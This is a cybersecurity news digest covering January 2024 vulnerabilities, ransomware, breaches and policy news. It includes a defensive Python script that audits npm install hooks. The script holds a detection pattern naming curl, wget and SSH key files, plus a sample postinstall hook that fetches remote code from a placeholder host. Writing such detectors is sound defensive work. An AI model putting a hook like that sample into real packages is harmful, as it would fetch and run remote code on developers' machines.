What’s trending in cybersecurity today?
Fortra’s GoAnywhere, Malicious npm Packages, GitHub, SSH Keys, Kasseika Ransomware, BYOVD, Antivirus, Splunk, Windows, CISA, Industrial Control Systems, Veolia North America, CL0P Ransomware, S&A Law Offices, India, Jason’s Deli, Data Breach, Credential Stuffing, Coronalab.eu, Database Breach, Russia, Akado, DDoS, NCSC, Malicious AI, Israel, Czech Republic, Amazon, Employee Surveillance Breach, VexTrio, X, iOS Passkeys.
Listen to the full podcast
Cyber Alerts
A significant security vulnerability in Fortra’s GoAnywhere Managed File Transfer (MFT) software poses a serious threat, allowing unauthorized users to create new administrator accounts. The flaw, tracked as CVE-2024-0204 with a CVSS score of 9.8, enables authentication bypass, allowing an attacker to create an admin user via the administration portal. Users are urged to upgrade to version 7.4.1 or apply temporary workarounds to mitigate the risk, since exploitation yields an administrative account on the appliance and with it the potential for a full breach.
Two harmful npm packages, warbeast2000 and kodiak2k, have been discovered on the npm package registry, using GitHub to store Base64-encoded SSH keys stolen from developer systems. Published in January 2024, these modules were downloaded 412 and 1,281 times before being removed by npm maintainers. ReversingLabs, a software supply chain security firm, identified eight versions of warbeast2000 and over 30 versions of kodiak2k, both executing postinstall scripts to retrieve and execute JavaScript files, posing a threat to software supply chain security.
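Because both packages relied on npm lifecycle hooks, a simple defensive check is to audit every package.json under node_modules for install-time scripts and flag those that reach out to the network or touch SSH material. The following script is an added example written for this digest, not code from ReversingLabs or npm; the package names, commands and patterns in it are constructed for illustration.

```python
import json
import os
import re

# Hooks npm runs automatically during install; the packages above used postinstall.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Constructed heuristic: commands that fetch remote content or reference SSH key material.
SUSPICIOUS = re.compile(r"(curl|wget|https?://|\.ssh|id_rsa|id_ed25519|base64)", re.IGNORECASE)


def audit_manifest(manifest: dict) -> list:
    """Return one finding per lifecycle hook present in a parsed package.json."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        # Any install hook deserves review; ones matching the heuristic are raised to "high".
        level = "high" if SUSPICIOUS.search(cmd) else "info"
        findings.append({"package": manifest.get("name", "?"), "hook": hook,
                         "command": cmd, "level": level})
    return findings


def audit_node_modules(root: str) -> list:
    """Walk an installed node_modules tree and audit every package.json found."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" in files:
            try:
                with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                    findings.extend(audit_manifest(json.load(fh)))
            except (OSError, ValueError):
                continue  # unreadable or malformed manifest: skip, do not crash the audit
    return findings


# Constructed sample manifests (hypothetical package names, not real registry contents).
SAMPLE_BENIGN = {"name": "example-plain", "scripts": {"test": "node test.js"}}
SAMPLE_HOOK = {"name": "example-native", "scripts": {"postinstall": "node-gyp rebuild"}}
SAMPLE_BAD = {"name": "example-stealer",
              "scripts": {"postinstall": "node -e \"require('https').get('https://example.invalid/x.js')\""}}

if __name__ == "__main__":
    for manifest in (SAMPLE_BENIGN, SAMPLE_HOOK, SAMPLE_BAD):
        for f in audit_manifest(manifest):
            print(f"[{f['level']}] {f['package']} {f['hook']}: {f['command']}")
```

Run `audit_node_modules("node_modules")` against a real project to list every install hook; a native build step will show as "info", while a hook that downloads and executes remote code is flagged "high".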
Kasseika ransomware employs Bring Your Own Vulnerable Driver (BYOVD) tactics, exploiting the Martini driver to disable antivirus software before encrypting files. Trend Micro analysts, who first uncovered Kasseika, note its attack chains and source code similarities with BlackMatter, suggesting it was likely built by former members or actors who purchased BlackMatter’s code. The ransomware uses phishing emails, Martini driver vulnerabilities, and BYOVD attacks to gain access, terminate antivirus processes, and encrypt files, with the ransom demand increasing the longer payment is delayed.
Splunk has resolved multiple vulnerabilities in Splunk Enterprise, with particular attention to a high-severity flaw affecting the Windows version (CVE-2024-23678, CVSS score 7.5). The identified vulnerability in Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3 involves incorrect sanitization of path input data, leading to unsafe deserialization of untrusted data from a separate disk partition on the machine. This flaw could allow the execution of malicious code on the system, emphasizing the importance for users to upgrade to versions 9.0.8, 9.1.3, or higher to mitigate potential risks.
CISA has issued six advisories highlighting security concerns and vulnerabilities in Industrial Control Systems (ICS) as of January 23, 2024. These advisories cover various systems, including APsystems Energy Communication Unit (ECU-C) Power Control Software, Crestron AM-300, Voltronic Power ViewPower Pro, Westermo Lynx 206-F2G, Lantronix XPort, and Orthanc Osimis DICOM Web Viewer. The advisories aim to provide essential information about existing security issues, vulnerabilities, and potential exploits within ICS, urging users and administrators to review the details and apply necessary mitigations.
Cyber Incidents
Veolia North America, a subsidiary of Veolia, experienced a ransomware attack affecting its Municipal Water division and bill payment systems. Following the attack, Veolia took defensive measures, temporarily shutting down some systems. While back-end systems are now restored, customers faced delays in online bill payments, and the company is collaborating with law enforcement and forensics experts to assess the attack’s impact on operations and systems.
S&A Law Offices, a prominent legal firm in India, faces a cyberattack claimed by the CL0P ransomware group. Alleged compromises include sensitive employee information, raising concerns about client confidentiality and potential reputational damage. This incident adds to the growing cyber threats against Indian organizations, emphasizing the need for heightened cybersecurity measures in the face of an escalating risk landscape.
Jason’s Deli, a US restaurant chain, alerts customers of a data breach, revealing that personal data was exposed in credential stuffing attacks. The incident occurred on December 21, 2023, as hackers obtained credentials from other sources in a credential stuffing attack against the restaurant’s website. The data exposed includes names, addresses, phone numbers, birthdays, and more, impacting potentially 344,034 customers, with Jason’s Deli urging impacted users to reset passwords and take precautionary measures.
An unsecured database linked to Netherlands-based medical laboratory Coronalab.eu, owned by Microbe and Lab, was found exposed on the internet, potentially impacting 1.3 million records. The exposed database included COVID test results, personally identifiable information (PII), and documents marked with Coronalab.eu’s name and logo. The records contained patient names, nationality, passport numbers, test results, and more. Security researcher Jeremiah Fowler discovered the trove, highlighting the need for healthcare entities to take responsibility for data security, especially when using third-party services like cloud computing.
Moscow’s primary internet provider, Akado Telecom, experienced its third outage since December, impacting government agencies, Putin’s administration, the FSO, and the FSB. The disruptions, attributed to Ukrainian hacktivist group IT Army of Ukraine, led to widespread outages affecting various government bodies and banking infrastructure. Akado Telecom, a major service provider for government entities and businesses, faced repeated DDoS attacks, causing extended internet outages, with Sberbank among the affected organizations. The attacks highlight the ongoing cyber tensions between Russia and Ukraine, impacting critical internet services in Moscow.
Cyber News
The UK’s National Cyber Security Centre (NCSC) has issued a warning that the use of malicious AI is likely to lead to an increase in cyber-attacks, particularly ransomware, over the next two years. The NCSC’s threat assessment highlights the use of generative AI (GenAI) in cybercrime, with offerings being developed in the underground. While currently, only well-resourced threat actors deploy sophisticated AI-powered attacks, the accessibility of publicly available AI models is lowering the entry barrier for novice cybercriminals. The NCSC emphasizes the importance of securing AI systems and advises organizations to follow cybersecurity hygiene practices to enhance their resilience against evolving cyber threats.
The Israel National Cyber Directorate and the Czech Republic National Cyber and Information Security Agency have formalized their collaboration through a signed memorandum, solidifying cybersecurity relations between the two nations. Discussions between Gaby Portnoy and Lukáš Kintr covered current cyberspace threats, including those stemming from the Gaza conflict. The memorandum aims to foster closer cooperation, enabling the sharing of information and experience to address evolving cybersecurity challenges.
France’s data protection agency imposed a €32 million fine on Amazon’s French warehouses unit for an intrusive surveillance system monitoring staff performance. The system used scanners to track workers, alerting management to inactivity exceeding 10 minutes or rapid handling of packages. The fine, nearly unprecedented, reflects a breach of the EU’s data protection regulations, and Amazon, while rejecting the findings, faces the need to adjust its surveillance practices to comply with privacy standards.
The cybercrime ecosystem reveals increasing professionalization and specialization through VexTrio, identified as the largest provider of traffic brokering. Cybersecurity firm Infoblox highlights the involvement of cybercrime groups like SocGholish and ClearFake with VexTrio. Acting as a malicious traffic broker, VexTrio employs traffic distribution systems, assessing victims based on various factors and routing them to malicious sites for affiliated groups. VexTrio’s six-year presence involves takeovers of legitimate domains, registration of thousands of malicious domains, and its role in redirecting victims to content like malware, ransomware, and scam pages.
X has introduced a new security feature, allowing iOS users in the United States to log into their accounts using passkeys. These passkeys, bound to the iOS device, offer robust protection against phishing attacks and unauthorized access attempts, significantly reducing the risk of breaches. By leveraging public key cryptography from the WebAuthn (Web Authentication) standard, passkeys enhance user experience and security by eliminating the need for complex passwords, ensuring a secure and convenient login process for X users.